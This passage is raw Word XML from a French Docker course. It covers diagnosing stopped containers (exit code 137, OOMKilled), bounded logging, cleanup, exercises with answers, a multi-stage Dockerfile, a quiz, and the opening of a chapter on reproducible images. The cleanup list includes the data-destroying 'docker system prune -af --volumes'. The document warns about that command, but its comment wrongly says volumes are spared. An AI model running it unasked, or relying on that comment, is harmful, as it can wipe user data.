        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rotation des logs</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`OOMKILLED`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>État d'un conteneur dont le processus a été tué par le noyau faute de mémoire. Le code de sortie est 137 ; il ne faut pas le confondre avec un plantage applicatif.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Identifier un arrêt par manque de mémoire</w:t>
        <w:br/>
        <w:t>docker inspect web --format '{{.State.OOMKilled}} {{.State.ExitCode}}'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Journalisation bornée</w:t>
        <w:br/>
        <w:t>docker run -d --log-opt max-size=10m --log-opt max-file=3 mon-app:1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>62.4 Nettoyer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les images, conteneurs et volumes s'accumulent. Un disque plein sur l'hôte provoque des erreurs difficiles à interpréter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Sept opérations de nettoyage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docker system df              # vue d'ensemble</w:t>
        <w:br/>
        <w:t>docker system df -v           # détail par élément</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker container prune        # conteneurs arrêtés</w:t>
        <w:br/>
        <w:t>docker image prune            # images sans étiquette</w:t>
        <w:br/>
        <w:t>docker image prune -a         # toutes les images non utilisées</w:t>
        <w:br/>
        <w:t>docker volume prune           # volumes non utilisés</w:t>
        <w:br/>
        <w:t>docker builder prune</w:t>
        <w:br/>
        <w:br/>
        <w:t># Tout nettoyer sauf les volumes (attention)</w:t>
        <w:br/>
        <w:t>docker system prune -af --volumes</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`PRUNE --VOLUMES` DÉTRUIT DES DONNÉES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un volume non monté n'est pas forcément inutile : il peut contenir une base arrêtée. Vérifiez avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>docker volume ls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et sauvegardez avant toute purge.</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INSPECTION D'UN CONTENEUR QUI NE DÉMARRE PAS</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docker logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : message d'erreur applicatif.</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docker inspect --format '{{.State.ExitCode}}'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : code de sortie.</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docker run --rm -it image sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : explorer l'image seule.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Vérifier les variables d'environnement et les volumes montés.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Vérifier les limites mémoire.</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conteneur est un processus isolé qui partage le noyau de l'hôte.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image est immuable et composée de couches.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cache de construction dépend de l'ordre des instructions.</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.dockerignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réduit le contexte et protège les secrets.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conteneur s'arrête avec son processus principal.</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--memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tue, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--cpus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ralentit.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code 137 signale souvent un manque de mémoire.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volumes peuvent contenir des données : ne pas les purger à l'aveugle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les conteneurs fonctionnent. Le chapitre suivant construit des images réellement reproductibles et sûres.</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62.1 — Écrire un Dockerfile multi-étapes</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Une application front-end doit être construite puis servie par Nginx.</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Séparez dépendances, construction et exécution.</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Utilisez une image finale minimale.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Ajoutez une vérification de santé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 62.2 — Diagnostiquer un conteneur arrêté</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   DIAGNOSTIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker ps -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> montre un conteneur arrêté immédiatement.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Consultez le code de sortie.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Lisez les journaux.</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Reproduisez en interactif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 62.3 — Limiter l'empreinte d'un conteneur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service consomme trop de mémoire et remplit le disque de journaux.</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Mesurez la consommation.</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Fixez des limites.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Configurez la rotation des journaux.</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62.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># syntax=docker/dockerfile:1</w:t>
        <w:br/>
        <w:t>FROM node:22-alpine AS build</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY package*.json ./</w:t>
        <w:br/>
        <w:t>RUN npm ci</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t>FROM nginx:1.27-alpine</w:t>
        <w:br/>
        <w:t>COPY --from=build /app/dist /usr/share/nginx/html</w:t>
        <w:br/>
        <w:t>COPY nginx.conf /etc/nginx/conf.d/default.conf</w:t>
        <w:br/>
        <w:t>RUN adduser -D -H -u 10001 app 2&gt;/dev/null || true</w:t>
        <w:br/>
        <w:t>USER nginx</w:t>
        <w:br/>
        <w:t>EXPOSE 80</w:t>
        <w:br/>
        <w:t>HEALTHCHECK --interval=30s --timeout=3s CMD wget -qO- http://127.0.0.1/ || exit 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'image finale ne contient ni Node ni les sources : elle est plus petite et présente moins de surface d'attaque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La vérification de santé permet à Docker et aux orchestrateurs de détecter un conteneur vivant mais incapable de servir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 62.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>docker ps -a</w:t>
        <w:br/>
        <w:t>docker inspect web --format '{{.State.ExitCode}} {{.State.OOMKilled}}'</w:t>
        <w:br/>
        <w:t>docker logs web</w:t>
        <w:br/>
        <w:br/>
        <w:t># Explorer sans démarrer la commande par défaut</w:t>
        <w:br/>
        <w:t>docker run --rm -it --entrypoint sh mon-app:1.0</w:t>
        <w:br/>
        <w:t># puis lancer la commande manuellement pour voir l'erreur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le code 0 avec un arrêt immédiat signifie que le processus principal s'est terminé normalement : souvent une commande mal formée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le code 137 indique un arrêt par le noyau, généralement pour mémoire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 62.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>docker stats --no-stream</w:t>
        <w:br/>
        <w:t>docker update --memory 512m --memory-swap 512m web</w:t>
        <w:br/>
        <w:t>docker run -d --log-opt max-size=10m --log-opt max-file=3 mon-app:1.0</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier après application</w:t>
        <w:br/>
        <w:t>docker inspect web --format '{{.HostConfig.Memory}} {{.HostConfig.LogConfig.Config}}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--memory-swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> égal à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interdit le recours au swap, ce qui rend la limite prévisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La rotation des journaux est souvent oubliée alors qu'elle remplit le disque en quelques jours.</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Qu'est-ce qu'un conteneur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Une machine virtuelle légère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Un processus isolé partageant le noyau</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Une image exécutable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Un hyperviseur</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 xml:space="preserve">Pourquoi copier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avant le code source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Pour la sécurité</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Pour profiter du cache de construction</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Pour la lisibilité</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Ce n'est pas utile</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--memory 512m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en cas de dépassement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Ralentit le conteneur</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Tue le processus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Écrit un journal</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Redémarre</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 signifie le code de sortie 137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Succès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Erreur de syntaxe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Arrêt par le noyau (mémoire)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Port occupé</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.dockerignore</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À nettoyer les images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À réduire le contexte de construction</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À limiter la mémoire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À exposer des ports</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L'isolation repose sur les espaces de noms et les groupes de contrôle.</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Les dépendances changent rarement : la couche reste en cache.</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Le noyau termine le processus, ce qui donne un code de sortie 137.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 128 + 9 (SIGKILL), fréquemment causé par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OOMKilled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Il évite d'envoyer des fichiers inutiles au démon Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>63. Images reproductibles et sûres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Construire des images qu'on peut reconstruire à l'identique, analyser et mettre à jour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 62</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Épingler les dépendances pour une construction reproductible.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Réduire la taille et la surface d'attaque d'une image.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Exécuter un conteneur sans privilèges.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Analyser et corriger les vulnérabilités.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Publier et versionner des images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>63.1 Reproductible, pas seulement fonctionnel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une image est reproductible si la reconstruire depuis les mêmes sources donne le même résultat. Sans épinglage, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> change sous vos pieds et deux constructions le même jour peuvent différer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.225 — Cinq sources de variabilité</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49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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Non reproductible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Reproductible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image de base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>node:latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>node:22.9.0-alpine3.20@sha256:…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Dépendances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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npm install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>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npm ci</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> avec verrou</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Paquets système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apt install curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
